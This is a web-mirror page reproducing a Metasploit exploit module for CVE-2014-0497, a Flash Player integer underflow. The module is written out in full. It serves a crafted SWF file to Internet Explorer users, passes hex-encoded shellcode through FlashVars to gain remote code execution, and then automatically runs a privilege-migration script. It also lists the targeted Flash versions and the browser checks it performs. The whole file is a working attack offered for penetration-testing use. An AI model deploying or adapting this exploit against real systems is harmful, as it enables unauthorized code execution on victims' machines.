Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flash_avm2.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::BrowserExploitServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "Adobe Flash Player Integer Underflow Remote Code Execution",

16
        'Description' => %q{

17
          This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player

18
          before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an

19
          integer underflow in several avm2 instructions, which can be turned into remote code

20
          execution under the context of the user, as exploited in the wild in February 2014. This

21
          module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP

22
          SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes

23
          rop chains for several Flash 11 versions, as exploited in the wild.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Unknown', # vulnerability discovery and exploit in the wild

28
          'juan vazquez' # msf module

29
        ],

30
        'References' => [

31
          [ 'CVE', '2014-0497' ],

32
          [ 'OSVDB', '102849' ],

33
          [ 'BID', '65327' ],

34
          [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ],

35
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ]

36
        ],

37
        'Payload' => {

38
          'Space' => 1024,

39
          'DisableNops' => true

40
        },

41
        'DefaultOptions' => {

42
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

43
          'Retries' => false

44
        },

45
        'Platform' => 'win',

46
        # Versions targeted in the wild:

47
        # [*] Windows 8:

48
        #   11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14

49
        #   11,6,602,167, 11,6,602,171 ,11,6,602,180

50
        #   11,7,700,169, 11,7,700,202, 11,7,700,224

51
        # [*] Before windows 8:

52
        #   11,0,1,152,

53
        #   11,1,102,55, 11,1,102,62, 11,1,102,63

54
        #   11,2,202,228, 11,2,202,233, 11,2,202,235

55
        #   11,3,300,257, 11,3,300,273

56
        #   11,4,402,278

57
        #   11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149

58
        #   11,6,602,168, 11,6,602,171, 11,6,602,180

59
        #   11,7,700,169, 11,7,700,202

60
        #   11,8,800,97, 11,8,800,50

61
        'BrowserRequirements' => {

62
          :source => /script|headers/i,

63
          :activex => [

64
            {

65
              clsid: '{D27CDB6E-AE6D-11cf-96B8-444553540000}',

66
              method: 'LoadMovie'

67
            }

68
          ],

69
          :os_name => OperatingSystems::Match::WINDOWS,

70
          :ua_name => Msf::HttpClients::IE,

71
          :flash => lambda { |ver| ver =~ /^11\./ }

72
        },

73
        'Targets' => [

74
          [ 'Automatic', {} ]

75
        ],

76
        'Privileged' => false,

77
        'DisclosureDate' => '2014-02-05',

78
        'DefaultTarget' => 0,

79
        'Notes' => {

80
          'Reliability' => UNKNOWN_RELIABILITY,

81
          'Stability' => UNKNOWN_STABILITY,

82
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

83
        }

84
      )

85
    )

86
  end

87


88
  def exploit

89
    @swf = create_swf

90
    super

91
  end

92


93
  def on_request_exploit(cli, request, target_info)

94
    print_status("Request: #{request.uri}")

95


96
    if request.uri =~ /\.swf$/

97
      print_status("Sending SWF...")

98
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash', 'Pragma' => 'no-cache' })

99
      return

100
    end

101


102
    print_status("Sending HTML...")

103
    tag = retrieve_tag(cli, request)

104
    profile = browser_profile[tag]

105
    profile[:tried] = false unless profile.nil? # to allow request the swf

106
    send_exploit_html(cli, exploit_template(cli, target_info), { 'Pragma' => 'no-cache' })

107
  end

108


109
  def exploit_template(cli, target_info)

110
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"

111
    shellcode = get_payload(cli, target_info).unpack("H*")[0]

112


113
    html_template = %Q|<html>

114
    <body>

115
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />

116
    <param name="movie" value="<%=swf_random%>" />

117
    <param name="allowScriptAccess" value="always" />

118
    <param name="FlashVars" value="id=<%=shellcode%>" />

119
    <param name="Play" value="true" />

120
    </object>

121
    </body>

122
    </html>

123
    |

124


125
    return html_template, binding()

126
  end

127


128
  def create_swf

129
    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf")

130
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

131


132
    swf

133
  end

134
end

135


136